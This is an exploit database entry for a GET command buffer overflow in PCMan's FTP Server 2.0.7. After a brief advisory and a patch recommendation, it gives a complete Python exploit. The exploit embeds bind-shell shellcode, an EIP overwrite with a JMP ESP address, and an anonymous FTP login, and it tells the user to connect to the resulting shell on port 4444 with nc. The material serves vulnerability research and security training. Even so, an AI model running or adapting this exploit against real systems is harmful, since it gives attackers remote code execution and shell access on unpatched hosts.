PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)

vendor:

PCMan's FTP Server

by:

Koby

CVSS

CRITICAL

Buffer Overflow

119

CWE

Product Name: PCMan's FTP Server

Affected Version From: 2

Affected Version To: 2.0.7

Patch Exists: YES

Related CWE:

CPE: a:pcman:pcman's_ftp_server:2.0

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2015

PCMan’s FTP Server v2.0 – GET command buffer overflow (remote shell)

The PCMan's FTP Server version 2.0 is vulnerable to a buffer overflow in the GET command, which can allow remote code execution and result in a remote shell. This can be exploited by sending a specially crafted GET command with a large payload, causing a buffer overflow and overwriting the return address. This exploit has been tested on Windows XP SP3.

Mitigation:

The vendor has released a patch for this vulnerability. It is recommended to update to the latest version of PCMan's FTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)
# Date:  28 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
# CVE : N/A

import socket
import sys

# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" 
"\x0e\x69\x8c\x9b\xa3\x83\xee\xfc\xe2\xf4\x95\x64\x19\xa3" 
"\x69\x8c\xfb\x2a\x8c\xbd\x5b\xc7\xe2\xdc\xab\x28\x3b\x80" 
"\x10\xf1\x7d\x07\xe9\x8b\x66\x3b\xd1\x85\x58\x73\x37\x9f" 
"\x08\xf0\x99\x8f\x49\x4d\x54\xae\x68\x4b\x79\x51\x3b\xdb" 
"\x10\xf1\x79\x07\xd1\x9f\xe2\xc0\x8a\xdb\x8a\xc4\x9a\x72" 
"\x38\x07\xc2\x83\x68\x5f\x10\xea\x71\x6f\xa1\xea\xe2\xb8" 
"\x10\xa2\xbf\xbd\x64\x0f\xa8\x43\x96\xa2\xae\xb4\x7b\xd6" 
"\x9f\x8f\xe6\x5b\x52\xf1\xbf\xd6\x8d\xd4\x10\xfb\x4d\x8d" 
"\x48\xc5\xe2\x80\xd0\x28\x31\x90\x9a\x70\xe2\x88\x10\xa2" 
"\xb9\x05\xdf\x87\x4d\xd7\xc0\xc2\x30\xd6\xca\x5c\x89\xd3" 
"\xc4\xf9\xe2\x9e\x70\x2e\x34\xe4\xa8\x91\x69\x8c\xf3\xd4" 
"\x1a\xbe\xc4\xf7\x01\xc0\xec\x85\x6e\x73\x4e\x1b\xf9\x8d" 
"\x9b\xa3\x40\x48\xcf\xf3\x01\xa5\x1b\xc8\x69\x73\x4e\xc9" 
"\x61\xd5\xcb\x41\x94\xcc\xcb\xe3\x39\xe4\x71\xac\xb6\x6c" 
"\x64\x76\xfe\xe4\x99\xa3\x78\xd0\x12\x45\x03\x9c\xcd\xf4" 
"\x01\x4e\x40\x94\x0e\x73\x4e\xf4\x01\x3b\x72\x9b\x96\x73" 
"\x4e\xf4\x01\xf8\x77\x98\x88\x73\x4e\xf4\xfe\xe4\xee\xcd" 
"\x24\xed\x64\x76\x01\xef\xf6\xc7\x69\x05\x78\xf4\x3e\xdb" 
"\xaa\x55\x03\x9e\xc2\xf5\x8b\x71\xfd\x64\x2d\xa8\xa7\xa2" 
"\x68\x01\xdf\x87\x79\x4a\x9b\xe7\x3d\xdc\xcd\xf5\x3f\xca" 
"\xcd\xed\x3f\xda\xc8\xf5\x01\xf5\x57\x9c\xef\x73\x4e\x2a" 
"\x89\xc2\xcd\xe5\x96\xbc\xf3\xab\xee\x91\xfb\x5c\xbc\x37" 
"\x6b\x16\xcb\xda\xf3\x05\xfc\x31\x06\x5c\xbc\xb0\x9d\xdf" 
"\x63\x0c\x60\x43\x1c\x89\x20\xe4\x7a\xfe\xf4\xc9\x69\xdf" 
"\x64\x76")


# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
# bad data is a string of 2007 "A" characters to get to an EIP overwrite
# followed by the JMP ESP instruction 0x7c9d30eb in SHELL32.dll
baddata = '\x41'*2007+'\xeb\x30\x9d\x7c'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

# change target IP/port as needed
# run this script then to connect use nc for your windows shell
# nc [target IP address] 4444
connect=s.connect(('192.168.1.135',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n')
s.close()